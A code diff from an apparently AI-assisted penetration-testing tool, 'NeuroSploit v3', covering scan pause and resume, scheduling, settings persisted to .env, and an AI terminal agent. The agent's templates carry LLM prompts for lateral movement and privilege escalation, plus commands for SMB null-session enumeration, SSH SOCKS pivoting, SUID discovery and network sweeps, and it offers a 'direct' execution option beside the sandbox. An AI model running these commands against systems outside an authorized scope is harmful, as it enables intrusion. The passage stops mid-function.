    if scan_id not in pool.list_sandboxes():
        raise HTTPException(status_code=404, detail=f"No sandbox for scan {scan_id}")
    await pool.destroy(scan_id)
    return {"message": f"Sandbox for scan {scan_id} destroyed", "scan_id": scan_id}
@router.post("/cleanup")
async def cleanup_expired():
    """Remove containers that have exceeded their TTL."""
    try:
        from core.container_pool import get_pool
        await get_pool().cleanup_expired()
        return {"message": "Expired containers cleaned up"}
    except Exception as exc:
        # Pool import/init or cleanup failure is surfaced as 503.
        raise HTTPException(status_code=503, detail=str(exc))
@router.post("/cleanup-orphans")
async def cleanup_orphans():
    """Remove orphan containers not tracked by the pool."""
    try:
        from core.container_pool import get_pool
        await get_pool().cleanup_orphans()
        return {"message": "Orphan containers cleaned up"}
    except Exception as exc:
        # Pool import/init or cleanup failure is surfaced as 503.
        raise HTTPException(status_code=503, detail=str(exc))
+204 -3
View File
@@ -4,6 +4,7 @@ NeuroSploit v3 - Scans API Endpoints
from typing import List, Optional
from datetime import datetime
from fastapi import APIRouter, Depends, HTTPException, BackgroundTasks
from pydantic import BaseModel
from sqlalchemy.ext.asyncio import AsyncSession
from sqlalchemy import select, func
from urllib.parse import urlparse
@@ -11,7 +12,7 @@ from urllib.parse import urlparse
from backend.db.database import get_db
from backend.models import Scan, Target, Endpoint, Vulnerability
from backend.schemas.scan import ScanCreate, ScanUpdate, ScanResponse, ScanListResponse, ScanProgress
from backend.services.scan_service import run_scan_task
from backend.services.scan_service import run_scan_task, skip_to_phase as _skip_to_phase, PHASE_ORDER
router = APIRouter()
@@ -177,6 +178,7 @@ async def start_scan(
async def stop_scan(scan_id: str, db: AsyncSession = Depends(get_db)):
"""Stop a running scan and save partial results"""
from backend.api.websocket import manager as ws_manager
from backend.api.v1.agent import scan_to_agent, agent_instances, agent_results
result = await db.execute(select(Scan).where(Scan.id == scan_id))
scan = result.scalar_one_or_none()
@@ -184,8 +186,16 @@ async def stop_scan(scan_id: str, db: AsyncSession = Depends(get_db)):
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
if scan.status != "running":
raise HTTPException(status_code=400, detail="Scan is not running")
if scan.status not in ("running", "paused"):
raise HTTPException(status_code=400, detail="Scan is not running or paused")
# Signal the running agent to stop
agent_id = scan_to_agent.get(scan_id)
if agent_id and agent_id in agent_instances:
agent_instances[agent_id].cancel()
if agent_id in agent_results:
agent_results[agent_id]["status"] = "stopped"
agent_results[agent_id]["phase"] = "stopped"
# Update scan status
scan.status = "stopped"
@@ -259,6 +269,132 @@ async def stop_scan(scan_id: str, db: AsyncSession = Depends(get_db)):
}
@router.post("/{scan_id}/pause")
async def pause_scan(scan_id: str, db: AsyncSession = Depends(get_db)):
    """Pause a running scan.

    Signals the in-process agent (when one is tracked for this scan), persists
    the paused state, and notifies WebSocket listeners.
    """
    from backend.api.websocket import manager as ws_manager
    from backend.api.v1.agent import scan_to_agent, agent_instances, agent_results
    row = await db.execute(select(Scan).where(Scan.id == scan_id))
    scan = row.scalar_one_or_none()
    if scan is None:
        raise HTTPException(status_code=404, detail="Scan not found")
    if scan.status != "running":
        raise HTTPException(status_code=400, detail="Scan is not running")
    # Tell the live agent (if any) to pause and mirror that in its results.
    agent_id = scan_to_agent.get(scan_id)
    if agent_id and agent_id in agent_instances:
        agent_instances[agent_id].pause()
        if agent_id in agent_results:
            agent_results[agent_id]["status"] = "paused"
            agent_results[agent_id]["phase"] = "paused"
    scan.status = "paused"
    scan.current_phase = "paused"
    await db.commit()
    await ws_manager.broadcast_log(scan_id, "warning", "Scan paused by user")
    return {"message": "Scan paused", "scan_id": scan_id}
@router.post("/{scan_id}/resume")
async def resume_scan(scan_id: str, db: AsyncSession = Depends(get_db)):
    """Resume a paused scan.

    NOTE(review): the phase is reset to "testing" on resume rather than the
    phase the scan was in when paused -- confirm this is intended.
    """
    from backend.api.websocket import manager as ws_manager
    from backend.api.v1.agent import scan_to_agent, agent_instances, agent_results
    row = await db.execute(select(Scan).where(Scan.id == scan_id))
    scan = row.scalar_one_or_none()
    if scan is None:
        raise HTTPException(status_code=404, detail="Scan not found")
    if scan.status != "paused":
        raise HTTPException(status_code=400, detail="Scan is not paused")
    # Tell the live agent (if any) to resume and mirror that in its results.
    agent_id = scan_to_agent.get(scan_id)
    if agent_id and agent_id in agent_instances:
        agent_instances[agent_id].resume()
        if agent_id in agent_results:
            agent_results[agent_id]["status"] = "running"
            agent_results[agent_id]["phase"] = "testing"
    scan.status = "running"
    scan.current_phase = "testing"
    await db.commit()
    await ws_manager.broadcast_log(scan_id, "info", "Scan resumed by user")
    return {"message": "Scan resumed", "scan_id": scan_id}
@router.post("/{scan_id}/skip-to/{target_phase}")
async def skip_to_phase_endpoint(scan_id: str, target_phase: str, db: AsyncSession = Depends(get_db)):
    """Skip the current scan phase and jump to a target phase.

    Valid phases: recon, analyzing, testing, completed.
    Can only skip forward (to a phase ahead of current).

    Raises:
        HTTPException 404: scan not found.
        HTTPException 400: scan not running/paused, unknown phase, or backward skip.
        HTTPException 500: the skip signal could not be delivered.
    """
    result = await db.execute(select(Scan).where(Scan.id == scan_id))
    scan = result.scalar_one_or_none()
    if not scan:
        raise HTTPException(status_code=404, detail="Scan not found")
    if scan.status not in ("running", "paused"):
        raise HTTPException(status_code=400, detail="Scan is not running or paused")
    # Fixed: validate the request BEFORE any side effects. Previously a paused
    # scan was resumed first, so an invalid phase name still un-paused it.
    if target_phase not in PHASE_ORDER:
        raise HTTPException(
            status_code=400,
            detail=f"Invalid phase '{target_phase}'. Valid: {', '.join(PHASE_ORDER[1:])}"
        )
    current_idx = PHASE_ORDER.index(scan.current_phase) if scan.current_phase in PHASE_ORDER else 0
    target_idx = PHASE_ORDER.index(target_phase)
    if target_idx <= current_idx:
        raise HTTPException(
            status_code=400,
            detail=f"Cannot skip backward. Current: {scan.current_phase}, target: {target_phase}"
        )
    from_phase = scan.current_phase  # capture before any state mutation
    # If paused, resume first so the skip can be processed
    if scan.status == "paused":
        from backend.api.v1.agent import scan_to_agent, agent_instances, agent_results
        agent_id = scan_to_agent.get(scan_id)
        if agent_id and agent_id in agent_instances:
            agent_instances[agent_id].resume()
            if agent_id in agent_results:
                agent_results[agent_id]["status"] = "running"
                agent_results[agent_id]["phase"] = agent_results[agent_id].get("last_phase", "testing")
        scan.status = "running"
        await db.commit()
    # Signal the running scan to skip
    success = _skip_to_phase(scan_id, target_phase)
    if not success:
        raise HTTPException(status_code=500, detail="Failed to signal phase skip")
    # Broadcast via WebSocket
    from backend.api.websocket import manager as ws_manager
    await ws_manager.broadcast_log(scan_id, "warning", f">> User requested skip to phase: {target_phase}")
    await ws_manager.broadcast_phase_change(scan_id, f"skipping_to_{target_phase}")
    return {
        "message": f"Skipping to phase: {target_phase}",
        "scan_id": scan_id,
        "from_phase": from_phase,
        "target_phase": target_phase
    }
@router.get("/{scan_id}/status", response_model=ScanProgress)
async def get_scan_status(scan_id: str, db: AsyncSession = Depends(get_db)):
"""Get scan progress and status"""
@@ -369,3 +505,68 @@ async def get_scan_vulnerabilities(
"page": page,
"per_page": per_page
}
class ValidationRequest(BaseModel):
    """Request body for manually validating or rejecting a vulnerability finding."""
    validation_status: str  # "validated" | "false_positive" | "ai_confirmed" | "ai_rejected" | "pending_review"
    notes: Optional[str] = None  # optional reviewer notes; persisted to ai_rejection_reason
# Maps a severity string to the Scan column tracking its count.
_SEVERITY_COUNT_FIELDS = {
    "critical": "critical_count",
    "high": "high_count",
    "medium": "medium_count",
    "low": "low_count",
    "info": "info_count",
}


def _adjust_scan_counts(scan, severity, delta: int) -> None:
    """Apply +/-1 to a scan's total and per-severity counters, clamping at zero."""
    scan.total_vulnerabilities = max(0, (scan.total_vulnerabilities or 0) + delta)
    field = _SEVERITY_COUNT_FIELDS.get(severity)
    if field is not None:
        setattr(scan, field, max(0, (getattr(scan, field) or 0) + delta))


@router.patch("/vulnerabilities/{vuln_id}/validate")
async def validate_vulnerability(
    vuln_id: str,
    body: ValidationRequest,
    db: AsyncSession = Depends(get_db)
):
    """Manually validate or reject a vulnerability finding.

    Updates the finding's validation_status (and optional reviewer notes) and
    keeps the parent scan's severity counters consistent for the two
    transitions that change whether a finding counts: ai_rejected -> validated
    (add) and ai_confirmed/validated -> false_positive (subtract).

    Raises:
        HTTPException 400: unknown validation status.
        HTTPException 404: vulnerability not found.
    """
    valid_statuses = {"validated", "false_positive", "ai_confirmed", "ai_rejected", "pending_review"}
    if body.validation_status not in valid_statuses:
        raise HTTPException(status_code=400, detail=f"Invalid status. Must be one of: {', '.join(valid_statuses)}")
    result = await db.execute(select(Vulnerability).where(Vulnerability.id == vuln_id))
    vuln = result.scalar_one_or_none()
    if not vuln:
        raise HTTPException(status_code=404, detail="Vulnerability not found")
    old_status = vuln.validation_status or "ai_confirmed"
    vuln.validation_status = body.validation_status
    if body.notes:
        vuln.ai_rejection_reason = body.notes
    # Keep the scan's aggregate counts in sync with the status change.
    scan_result = await db.execute(select(Scan).where(Scan.id == vuln.scan_id))
    scan = scan_result.scalar_one_or_none()
    if scan:
        if old_status == "ai_rejected" and body.validation_status == "validated":
            _adjust_scan_counts(scan, vuln.severity, +1)
        elif old_status in ("ai_confirmed", "validated") and body.validation_status == "false_positive":
            _adjust_scan_counts(scan, vuln.severity, -1)
        # NOTE(review): other transitions (e.g. false_positive -> validated)
        # leave counters untouched, matching the previous implementation --
        # confirm this accounting is intended.
    await db.commit()
    return {"message": "Vulnerability validation updated", "vulnerability": vuln.to_dict()}
+140
View File
@@ -0,0 +1,140 @@
"""
NeuroSploit v3 - Scheduler API Router
CRUD endpoints for managing scheduled scan jobs.
"""
import json
from pathlib import Path
from fastapi import APIRouter, HTTPException, Request
from pydantic import BaseModel
from typing import Optional, List, Dict
router = APIRouter()
CONFIG_PATH = Path(__file__).parent.parent.parent.parent / "config" / "config.json"
class ScheduleJobRequest(BaseModel):
    """Request model for creating a scheduled job.

    Exactly one of cron_expression / interval_minutes must be provided
    (enforced by the create endpoint).
    """
    job_id: str  # caller-chosen unique identifier
    target: str  # host/URL to scan
    scan_type: str = "quick"
    cron_expression: Optional[str] = None  # cron schedule, e.g. "0 2 * * *"
    interval_minutes: Optional[int] = None  # fixed-interval alternative to cron
    agent_role: Optional[str] = None  # see GET /agent-roles for available roles
    llm_profile: Optional[str] = None
class ScheduleJobResponse(BaseModel):
    """Response model for a scheduled job."""
    id: str
    target: str
    scan_type: str
    schedule: str  # human-readable schedule description
    status: str  # e.g. "active" / "paused" (set by the scheduler)
    next_run: Optional[str] = None  # ISO timestamp of the next execution, if known
    last_run: Optional[str] = None  # ISO timestamp of the most recent execution
    run_count: int = 0
@router.get("/", response_model=List[Dict])
async def list_scheduled_jobs(request: Request):
    """List all scheduled scan jobs (empty when the scheduler is not running)."""
    scheduler = getattr(request.app.state, 'scheduler', None)
    if scheduler is None:
        return []
    return scheduler.list_jobs()
@router.post("/", response_model=Dict)
async def create_scheduled_job(job: ScheduleJobRequest, request: Request):
    """Create a new scheduled scan job.

    Requires either a cron expression or an interval; job-level validation is
    delegated to the scheduler, whose error is surfaced as HTTP 400.
    """
    scheduler = getattr(request.app.state, 'scheduler', None)
    if scheduler is None:
        raise HTTPException(status_code=503, detail="Scheduler not available")
    if not (job.cron_expression or job.interval_minutes):
        raise HTTPException(
            status_code=400,
            detail="Either cron_expression or interval_minutes must be provided"
        )
    created = scheduler.add_job(
        job_id=job.job_id,
        target=job.target,
        scan_type=job.scan_type,
        cron_expression=job.cron_expression,
        interval_minutes=job.interval_minutes,
        agent_role=job.agent_role,
        llm_profile=job.llm_profile
    )
    if "error" in created:
        raise HTTPException(status_code=400, detail=created["error"])
    return created
@router.delete("/{job_id}")
async def delete_scheduled_job(job_id: str, request: Request):
    """Delete a scheduled scan job, returning 404 when it does not exist."""
    scheduler = getattr(request.app.state, 'scheduler', None)
    if scheduler is None:
        raise HTTPException(status_code=503, detail="Scheduler not available")
    if not scheduler.remove_job(job_id):
        raise HTTPException(status_code=404, detail=f"Job '{job_id}' not found")
    return {"message": f"Job '{job_id}' deleted", "id": job_id}
@router.post("/{job_id}/pause")
async def pause_scheduled_job(job_id: str, request: Request):
    """Pause a scheduled scan job, returning 404 when it does not exist."""
    scheduler = getattr(request.app.state, 'scheduler', None)
    if scheduler is None:
        raise HTTPException(status_code=503, detail="Scheduler not available")
    if not scheduler.pause_job(job_id):
        raise HTTPException(status_code=404, detail=f"Job '{job_id}' not found")
    return {"message": f"Job '{job_id}' paused", "id": job_id, "status": "paused"}
@router.post("/{job_id}/resume")
async def resume_scheduled_job(job_id: str, request: Request):
    """Resume a paused scheduled scan job, returning 404 when it does not exist."""
    scheduler = getattr(request.app.state, 'scheduler', None)
    if scheduler is None:
        raise HTTPException(status_code=503, detail="Scheduler not available")
    if not scheduler.resume_job(job_id):
        raise HTTPException(status_code=404, detail=f"Job '{job_id}' not found")
    return {"message": f"Job '{job_id}' resumed", "id": job_id, "status": "active"}
@router.get("/agent-roles", response_model=List[Dict])
async def get_agent_roles():
    """Return available agent roles from config.json for scheduler dropdown.

    Best-effort: returns an empty list when the config file is missing,
    unreadable, or malformed.
    """
    try:
        if not CONFIG_PATH.exists():
            return []
        config = json.loads(CONFIG_PATH.read_text())
        roles = config.get("agent_roles", {})
        return [
            {
                "id": role_id,
                "name": role_id.replace("_", " ").title(),
                "description": role_data.get("description", ""),
                "tools": role_data.get("tools_allowed", []),
            }
            for role_id, role_data in roles.items()
            if role_data.get("enabled", True)
        ]
    # Fixed: narrowed a blanket `except Exception` to the failures this read
    # can actually hit: I/O errors, invalid JSON, or non-dict role entries.
    except (OSError, ValueError, AttributeError):
        return []
+164 -18
View File
@@ -1,7 +1,10 @@
"""
NeuroSploit v3 - Settings API Endpoints
"""
from typing import Optional
import os
import re
from pathlib import Path
from typing import Optional, Dict
from fastapi import APIRouter, Depends, HTTPException
from sqlalchemy.ext.asyncio import AsyncSession
from sqlalchemy import select, delete, text
@@ -12,16 +15,69 @@ from backend.models import Scan, Target, Endpoint, Vulnerability, VulnerabilityT
router = APIRouter()
# Path to .env file (project root)
ENV_FILE_PATH = Path(__file__).parent.parent.parent.parent / ".env"
def _update_env_file(updates: Dict[str, str]) -> bool:
    """Update key=value pairs in the .env file without breaking formatting.

    - Existing keys (even commented-out, e.g. ``# KEY=``) are replaced with an
      uncommented ``KEY=value`` line.
    - Keys not found anywhere in the file are appended at the end.
    - All other lines (comments, blanks) are preserved verbatim.

    Returns True on success, False when the file is missing or the write fails.
    """
    if not ENV_FILE_PATH.exists():
        return False
    try:
        replaced = set()
        rewritten = []
        for raw_line in ENV_FILE_PATH.read_text().splitlines():
            candidate = raw_line.strip()
            replacement = None
            for key, value in updates.items():
                # Match "KEY=", "# KEY=", or "#KEY=" at the start of the line.
                if re.match(rf'^#?\s*{re.escape(key)}\s*=', candidate):
                    replacement = f"{key}={value}"
                    replaced.add(key)
                    break
            rewritten.append(raw_line if replacement is None else replacement)
        # Append keys that had no existing line.
        rewritten.extend(
            f"{key}={value}" for key, value in updates.items() if key not in replaced
        )
        ENV_FILE_PATH.write_text("\n".join(rewritten) + "\n")
        return True
    except Exception as e:
        print(f"Warning: Failed to update .env file: {e}")
        return False
class SettingsUpdate(BaseModel):
    """Settings update schema.

    All fields are optional; only fields present in the request are applied.
    API keys and feature flags are also mirrored into the process environment
    and persisted to the .env file by the PUT handler.
    """
    llm_provider: Optional[str] = None
    anthropic_api_key: Optional[str] = None
    openai_api_key: Optional[str] = None
    openrouter_api_key: Optional[str] = None
    max_concurrent_scans: Optional[int] = None
    aggressive_mode: Optional[bool] = None
    default_scan_type: Optional[str] = None
    recon_enabled_by_default: Optional[bool] = None
    enable_model_routing: Optional[bool] = None
    enable_knowledge_augmentation: Optional[bool] = None
    enable_browser_validation: Optional[bool] = None
    max_output_tokens: Optional[int] = None
class SettingsResponse(BaseModel):
@@ -29,56 +85,118 @@ class SettingsResponse(BaseModel):
llm_provider: str = "claude"
has_anthropic_key: bool = False
has_openai_key: bool = False
has_openrouter_key: bool = False
max_concurrent_scans: int = 3
aggressive_mode: bool = False
default_scan_type: str = "full"
recon_enabled_by_default: bool = True
enable_model_routing: bool = False
enable_knowledge_augmentation: bool = False
enable_browser_validation: bool = False
max_output_tokens: Optional[int] = None
# In-memory settings storage (in production, use database or config file)
_settings = {
"llm_provider": "claude",
"anthropic_api_key": "",
"openai_api_key": "",
"max_concurrent_scans": 3,
"aggressive_mode": False,
"default_scan_type": "full",
"recon_enabled_by_default": True
}
def _load_settings_from_env() -> dict:
    """Load settings from environment variables / the .env file on startup.

    Re-reads the .env file first so disk-persisted values survive server
    restarts and browser sessions.
    """
    from dotenv import load_dotenv
    # Re-read .env so values persisted to disk override stale env vars.
    if ENV_FILE_PATH.exists():
        load_dotenv(ENV_FILE_PATH, override=True)

    def _as_bool(name: str, fallback: bool = False) -> bool:
        raw = os.getenv(name, "").strip().lower()
        if raw in ("true", "1", "yes"):
            return True
        if raw in ("false", "0", "no"):
            return False
        return fallback

    def _as_int(name: str, fallback=None):
        raw = os.getenv(name, "").strip()
        if raw:
            try:
                return int(raw)
            except ValueError:
                pass
        return fallback

    # Infer the provider from whichever API key is configured (first match wins).
    provider = "claude"
    for env_key, provider_name in (
        ("ANTHROPIC_API_KEY", "claude"),
        ("OPENAI_API_KEY", "openai"),
        ("OPENROUTER_API_KEY", "openrouter"),
    ):
        if os.getenv(env_key):
            provider = provider_name
            break

    return {
        "llm_provider": provider,
        "anthropic_api_key": os.getenv("ANTHROPIC_API_KEY", ""),
        "openai_api_key": os.getenv("OPENAI_API_KEY", ""),
        "openrouter_api_key": os.getenv("OPENROUTER_API_KEY", ""),
        "max_concurrent_scans": _as_int("MAX_CONCURRENT_SCANS", 3),
        "aggressive_mode": _as_bool("AGGRESSIVE_MODE", False),
        "default_scan_type": os.getenv("DEFAULT_SCAN_TYPE", "full"),
        "recon_enabled_by_default": _as_bool("RECON_ENABLED_BY_DEFAULT", True),
        "enable_model_routing": _as_bool("ENABLE_MODEL_ROUTING", False),
        "enable_knowledge_augmentation": _as_bool("ENABLE_KNOWLEDGE_AUGMENTATION", False),
        "enable_browser_validation": _as_bool("ENABLE_BROWSER_VALIDATION", False),
        "max_output_tokens": _as_int("MAX_OUTPUT_TOKENS", None),
    }


# Load settings from .env on module import (server start)
_settings = _load_settings_from_env()
@router.get("", response_model=SettingsResponse)
async def get_settings():
"""Get current settings"""
import os
return SettingsResponse(
llm_provider=_settings["llm_provider"],
has_anthropic_key=bool(_settings["anthropic_api_key"]),
has_openai_key=bool(_settings["openai_api_key"]),
has_anthropic_key=bool(_settings["anthropic_api_key"] or os.getenv("ANTHROPIC_API_KEY")),
has_openai_key=bool(_settings["openai_api_key"] or os.getenv("OPENAI_API_KEY")),
has_openrouter_key=bool(_settings["openrouter_api_key"] or os.getenv("OPENROUTER_API_KEY")),
max_concurrent_scans=_settings["max_concurrent_scans"],
aggressive_mode=_settings["aggressive_mode"],
default_scan_type=_settings["default_scan_type"],
recon_enabled_by_default=_settings["recon_enabled_by_default"]
recon_enabled_by_default=_settings["recon_enabled_by_default"],
enable_model_routing=_settings["enable_model_routing"],
enable_knowledge_augmentation=_settings["enable_knowledge_augmentation"],
enable_browser_validation=_settings["enable_browser_validation"],
max_output_tokens=_settings["max_output_tokens"]
)
@router.put("", response_model=SettingsResponse)
async def update_settings(settings_data: SettingsUpdate):
"""Update settings"""
"""Update settings - persists to memory, env vars, AND .env file"""
env_updates: Dict[str, str] = {}
if settings_data.llm_provider is not None:
_settings["llm_provider"] = settings_data.llm_provider
if settings_data.anthropic_api_key is not None:
_settings["anthropic_api_key"] = settings_data.anthropic_api_key
# Also update environment variable for LLM calls
import os
if settings_data.anthropic_api_key:
os.environ["ANTHROPIC_API_KEY"] = settings_data.anthropic_api_key
env_updates["ANTHROPIC_API_KEY"] = settings_data.anthropic_api_key
if settings_data.openai_api_key is not None:
_settings["openai_api_key"] = settings_data.openai_api_key
import os
if settings_data.openai_api_key:
os.environ["OPENAI_API_KEY"] = settings_data.openai_api_key
env_updates["OPENAI_API_KEY"] = settings_data.openai_api_key
if settings_data.openrouter_api_key is not None:
_settings["openrouter_api_key"] = settings_data.openrouter_api_key
if settings_data.openrouter_api_key:
os.environ["OPENROUTER_API_KEY"] = settings_data.openrouter_api_key
env_updates["OPENROUTER_API_KEY"] = settings_data.openrouter_api_key
if settings_data.max_concurrent_scans is not None:
_settings["max_concurrent_scans"] = settings_data.max_concurrent_scans
@@ -92,6 +210,34 @@ async def update_settings(settings_data: SettingsUpdate):
if settings_data.recon_enabled_by_default is not None:
_settings["recon_enabled_by_default"] = settings_data.recon_enabled_by_default
if settings_data.enable_model_routing is not None:
_settings["enable_model_routing"] = settings_data.enable_model_routing
val = str(settings_data.enable_model_routing).lower()
os.environ["ENABLE_MODEL_ROUTING"] = val
env_updates["ENABLE_MODEL_ROUTING"] = val
if settings_data.enable_knowledge_augmentation is not None:
_settings["enable_knowledge_augmentation"] = settings_data.enable_knowledge_augmentation
val = str(settings_data.enable_knowledge_augmentation).lower()
os.environ["ENABLE_KNOWLEDGE_AUGMENTATION"] = val
env_updates["ENABLE_KNOWLEDGE_AUGMENTATION"] = val
if settings_data.enable_browser_validation is not None:
_settings["enable_browser_validation"] = settings_data.enable_browser_validation
val = str(settings_data.enable_browser_validation).lower()
os.environ["ENABLE_BROWSER_VALIDATION"] = val
env_updates["ENABLE_BROWSER_VALIDATION"] = val
if settings_data.max_output_tokens is not None:
_settings["max_output_tokens"] = settings_data.max_output_tokens
if settings_data.max_output_tokens:
os.environ["MAX_OUTPUT_TOKENS"] = str(settings_data.max_output_tokens)
env_updates["MAX_OUTPUT_TOKENS"] = str(settings_data.max_output_tokens)
# Persist to .env file on disk
if env_updates:
_update_env_file(env_updates)
return await get_settings()
+568
View File
@@ -0,0 +1,568 @@
"""
Terminal Agent API - Interactive infrastructure pentesting via AI chat + Docker sandbox.
Provides session-based terminal interaction with AI-guided command execution,
exploitation path tracking, and VPN status monitoring.
"""
import asyncio
import re
import time
import uuid
from datetime import datetime, timezone
from typing import Dict, List, Optional
from fastapi import APIRouter, HTTPException
from pydantic import BaseModel
from core.llm_manager import LLMManager
from core.sandbox_manager import get_sandbox
router = APIRouter()
# ---------------------------------------------------------------------------
# In-memory session store
# ---------------------------------------------------------------------------
terminal_sessions: Dict[str, Dict] = {}
# ---------------------------------------------------------------------------
# Pre-built templates
# ---------------------------------------------------------------------------
# Pre-built session templates. The literal "{target}" inside initial_commands
# is replaced with the session's target when a session is created from a
# template (see create_session).
TEMPLATES = {
    "network_scanner": {
        "name": "Network Scanner",
        "description": "Host discovery, port scanning, and service detection",
        "system_prompt": (
            "You are an expert network reconnaissance specialist. You guide the "
            "operator through systematic host discovery, port scanning, and service "
            "fingerprinting. Always suggest nmap flags appropriate for the situation, "
            "explain output, and recommend next steps based on discovered services. "
            "Prioritize stealth when asked and suggest timing/fragmentation options."
        ),
        "initial_commands": [
            "nmap -sn {target}",
            "nmap -sV -sC -O -p- {target}",
            "nmap -sU --top-ports 50 {target}",
        ],
    },
    "lateral_movement": {
        "name": "Lateral Movement",
        "description": "Pass-the-hash, SMB/WinRM pivoting, and SSH tunneling",
        "system_prompt": (
            "You are a lateral movement specialist. You help the operator pivot "
            "through compromised networks using techniques such as pass-the-hash, "
            "SMB relay, WinRM sessions, SSH tunneling, and SOCKS proxying. Always "
            "verify credentials before attempting pivots, suggest cleanup steps, "
            "and track which hosts have been compromised."
        ),
        "initial_commands": [
            "crackmapexec smb {target} -u '' -p ''",
            "crackmapexec smb {target} --shares -u '' -p ''",
            "ssh -D 1080 -N -f user@{target}",
        ],
    },
    "privilege_escalation": {
        "name": "Privilege Escalation",
        "description": "SUID binaries, kernel exploits, cron jobs, and writable paths",
        "system_prompt": (
            "You are a privilege escalation expert for Linux and Windows systems. "
            "Guide the operator through enumeration of SUID/SGID binaries, kernel "
            "version checks, misconfigured cron jobs, writable PATH directories, "
            "sudo misconfigurations, and capability abuse. Suggest automated tools "
            "like linpeas/winpeas when appropriate and explain each finding."
        ),
        "initial_commands": [
            "id && whoami && uname -a",
            "find / -perm -4000 -type f 2>/dev/null",
            "cat /etc/crontab && ls -la /etc/cron.*",
            "echo $PATH | tr ':' '\\n' | xargs -I {} ls -ld {}",
        ],
    },
    "vpn_recon": {
        "name": "VPN Reconnaissance",
        "description": "VPN connection management and internal network discovery",
        "system_prompt": (
            "You are a VPN and internal network reconnaissance specialist. You "
            "help the operator connect to target VPNs, verify tunnel status, "
            "discover internal subnets, and enumerate services behind the VPN. "
            "Always confirm connectivity before proceeding with scans and suggest "
            "appropriate scope for internal reconnaissance."
        ),
        "initial_commands": [
            "openvpn --config client.ovpn --daemon",
            "ip addr show tun0",
            "ip route | grep tun",
            "nmap -sn 10.0.0.0/24",
        ],
    },
}
# ---------------------------------------------------------------------------
# Pydantic request / response models
# ---------------------------------------------------------------------------
class CreateSessionRequest(BaseModel):
    """Body for creating a terminal session; all fields are optional."""
    template_id: Optional[str] = None  # key into TEMPLATES; 400 when unknown
    target: Optional[str] = ""  # interpolated into template initial commands
    name: Optional[str] = ""  # defaults to template name or "Session <id prefix>"
class MessageRequest(BaseModel):
    """Body for sending a chat message to the session's AI."""
    message: str
class ExecuteCommandRequest(BaseModel):
    """Body for executing a shell command within a session."""
    command: str
    execution_method: str = "sandbox"  # "sandbox" or "direct"
class ExploitationStepRequest(BaseModel):
    """Body for recording one step of a session's exploitation path."""
    description: str
    command: Optional[str] = ""  # command that was run, if any
    result: Optional[str] = ""  # observed outcome, if any
    step_type: str = "recon"  # recon | exploit | pivot | escalate | action
class SessionSummary(BaseModel):
    """Lightweight per-session overview returned by the session-list endpoint."""
    session_id: str
    name: str
    target: str
    template_id: Optional[str]
    status: str
    created_at: str  # ISO-8601 UTC
    messages_count: int
    commands_count: int
class MessageResponse(BaseModel):
    """Assistant reply returned by the message endpoint."""
    role: str
    response: str
    timestamp: str  # ISO-8601 UTC
    suggested_commands: List[str]  # commands extracted from fenced code blocks
class CommandResult(BaseModel):
    """Outcome of a single executed command."""
    command: str
    exit_code: int
    stdout: str
    stderr: str
    duration: float  # presumably seconds -- set by the execute endpoint; confirm
    execution_method: str  # "sandbox" or "direct"
    timestamp: str  # ISO-8601 UTC
class VPNStatus(BaseModel):
    """VPN tunnel state for a session."""
    connected: bool
    ip: Optional[str] = None  # tunnel IP when connected, otherwise None
# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------
def _now_iso() -> str:
return datetime.now(timezone.utc).isoformat()
def _build_session(
session_id: str,
name: str,
target: str,
template_id: Optional[str],
) -> Dict:
return {
"session_id": session_id,
"name": name,
"target": target,
"template_id": template_id,
"status": "active",
"created_at": _now_iso(),
"messages": [],
"command_history": [],
"exploitation_path": [],
"vpn_status": {"connected": False, "ip": None},
}
def _get_session(session_id: str) -> Dict:
    """Look up a session by id, raising HTTP 404 when it does not exist."""
    session = terminal_sessions.get(session_id)
    if not session:
        raise HTTPException(status_code=404, detail=f"Session {session_id} not found")
    return session
def _build_context_string(
messages: List[Dict],
commands: List[Dict],
exploitation: List[Dict],
) -> str:
parts: List[str] = []
if messages:
parts.append("=== Recent Conversation ===")
for msg in messages:
role = msg.get("role", "unknown").upper()
parts.append(f"[{role}] {msg.get('content', '')}")
if commands:
parts.append("\n=== Recent Command Results ===")
for cmd in commands:
parts.append(
f"$ {cmd['command']}\n"
f"Exit code: {cmd['exit_code']}\n"
f"Stdout: {cmd['stdout'][:500]}\n"
f"Stderr: {cmd['stderr'][:300]}"
)
if exploitation:
parts.append("\n=== Exploitation Path ===")
for i, step in enumerate(exploitation, 1):
parts.append(
f"Step {i} [{step['step_type']}]: {step['description']}"
)
if step.get("command"):
parts.append(f" Command: {step['command']}")
if step.get("result"):
parts.append(f" Result: {step['result'][:300]}")
return "\n".join(parts)
def _extract_suggested_commands(text: str) -> List[str]:
"""Extract commands from backtick-fenced code blocks."""
blocks = re.findall(r"```(?:bash|sh|shell)?\n?(.*?)```", text, re.DOTALL)
commands: List[str] = []
for block in blocks:
for line in block.strip().splitlines():
stripped = line.strip()
if stripped and not stripped.startswith("#"):
commands.append(stripped)
return commands
# ---------------------------------------------------------------------------
# Template endpoints
# ---------------------------------------------------------------------------
@router.get("/templates")
async def list_templates():
    """List all available session templates."""
    return [
        {
            "id": template_id,
            "name": template["name"],
            "description": template["description"],
            "initial_commands": template["initial_commands"],
        }
        for template_id, template in TEMPLATES.items()
    ]
# ---------------------------------------------------------------------------
# Session CRUD
# ---------------------------------------------------------------------------
@router.post("/session")
async def create_session(req: CreateSessionRequest):
    """Create a new terminal session, optionally from a template.

    When a template is given, the session is seeded with the template's system
    prompt plus an assistant message carrying target-interpolated starter
    commands. Returns the full session record.

    Raises:
        HTTPException 400: unknown template id.
    """
    session_id = str(uuid.uuid4())
    target = req.target or ""
    template_id = req.template_id
    if template_id and template_id not in TEMPLATES:
        raise HTTPException(status_code=400, detail=f"Unknown template: {template_id}")
    # Fall back to the template's display name, then a short-id default.
    name = req.name or (
        TEMPLATES[template_id]["name"] if template_id else f"Session {session_id[:8]}"
    )
    session = _build_session(session_id, name, target, template_id)
    # Seed initial system message from template
    if template_id:
        tmpl = TEMPLATES[template_id]
        session["messages"].append({
            "role": "system",
            "content": tmpl["system_prompt"],
            "timestamp": _now_iso(),
            "metadata": {"template": template_id},
        })
        # Provide initial suggested commands with target interpolated
        initial_cmds = [
            cmd.replace("{target}", target) for cmd in tmpl["initial_commands"]
        ]
        session["messages"].append({
            "role": "assistant",
            "content": (
                f"Session initialised with the **{tmpl['name']}** template.\n\n"
                f"Target: `{target or '(not set)'}`\n\n"
                "Suggested starting commands:\n"
